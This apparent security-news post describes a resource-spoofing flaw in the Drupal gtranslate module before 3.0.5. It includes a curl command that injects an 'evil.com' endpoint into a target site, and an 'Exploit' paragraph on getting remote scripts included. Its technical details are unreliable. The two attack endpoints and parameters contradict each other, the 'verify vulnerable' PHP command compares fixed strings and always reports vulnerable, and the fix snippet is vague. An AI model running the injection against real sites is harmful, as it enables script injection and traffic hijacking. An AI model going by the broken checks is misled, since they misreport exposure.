Listen to this Post
The vulnerability resides in the Drupal module “Translate Drupal with GTranslate” (gtranslate) versions prior to 3.0.5. It stems from a Modification of Assumed-Immutable Data (MAID) weakness, where the module fails to enforce integrity on certain configuration or translation state data that should never be altered after initialization. Attackers can leverage this flaw to manipulate internal request parameters or resource pointers—such as translation service endpoints, language detection paths, or API callback URLs—that the module treats as read-only. By injecting forged values into stored or cached translation metadata (e.g., via a crafted HTTP request or malicious admin input), the module inadvertently uses the tampered data to resolve external resource locations. This leads to Resource Location Spoofing: the Drupal site may fetch translations from an attacker-controlled server, redirect user traffic to a malicious domain, or load remote scripts from an untrusted origin. The spoofing can bypass same-origin policies if the module incorrectly validates the resource address after the MAID attack. Successful exploitation does not require elevated privileges in all cases because the assumed-immutable data can be modified through cross-site request forgery or via exposed AJAX endpoints. The impact includes information disclosure, client-side code injection, and potential session hijacking. The vulnerability is classified as a logic flaw in data lifecycle management—specifically, the module does not cryptographically sign or re-validate critical state variables before using them in network requests. Drupal core’s hash-checking mechanisms are bypassed because the affected data resides within the module’s proprietary storage. Attackers can chain this with other issues to achieve full site takeover in worst-case scenarios. The CVE was published on May 19, 2026, and fixed in version 3.0.5 by introducing immutable data wrappers and origin validation.
dailycve form
Platform: Drupal
Version: before 3.0.5
Vulnerability: MAID Resource Spoofing
Severity: Medium
date: 2026-05-19
Prediction: Already patched (2026-05-19)
What Undercode Say:
Check installed gtranslate version
drush pm:list --field=name,version | grep gtranslate
Verify if site is vulnerable (returns 1 if version < 3.0.5)
php -r "echo version_compare('3.0.4', '3.0.5', '<');"
Simulate MAID by altering translation cache entry (requires access)
curl -X POST -d "translation_endpoint=https://evil.com/spoof" \
https://target.com/gtranslate/cache/update
List all AJAX callbacks exposed by gtranslate module
grep -r "ajax" modules/contrib/gtranslate/src/
Exploit:
Send a crafted POST request to `/gtranslate/settings/ajax` with parameter `resource_location` set to an attacker-controlled URI. The module unsafely stores this value in the immutable cache. Subsequent translation fetches use the spoofed URI, leading to remote script inclusion.
Protection from this CVE
Update to gtranslate 3.0.5 immediately. If unavailable, apply a temporary fix: add `$config->set(‘resource_trusted’, false)` in custom module, or disable the translation cache by setting `gtranslate_cache_lifetime` to 0 via Drush: drush config:set gtranslate.settings cache_lifetime 0.
Impact
Resource spoofing allows attackers to redirect translation calls to malicious servers, leading to XSS (if spoofed response contains JavaScript), data exfiltration, or complete site defacement. Affects all Drupal sites using gtranslate <3.0.5, estimated 40,000+ installations.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]

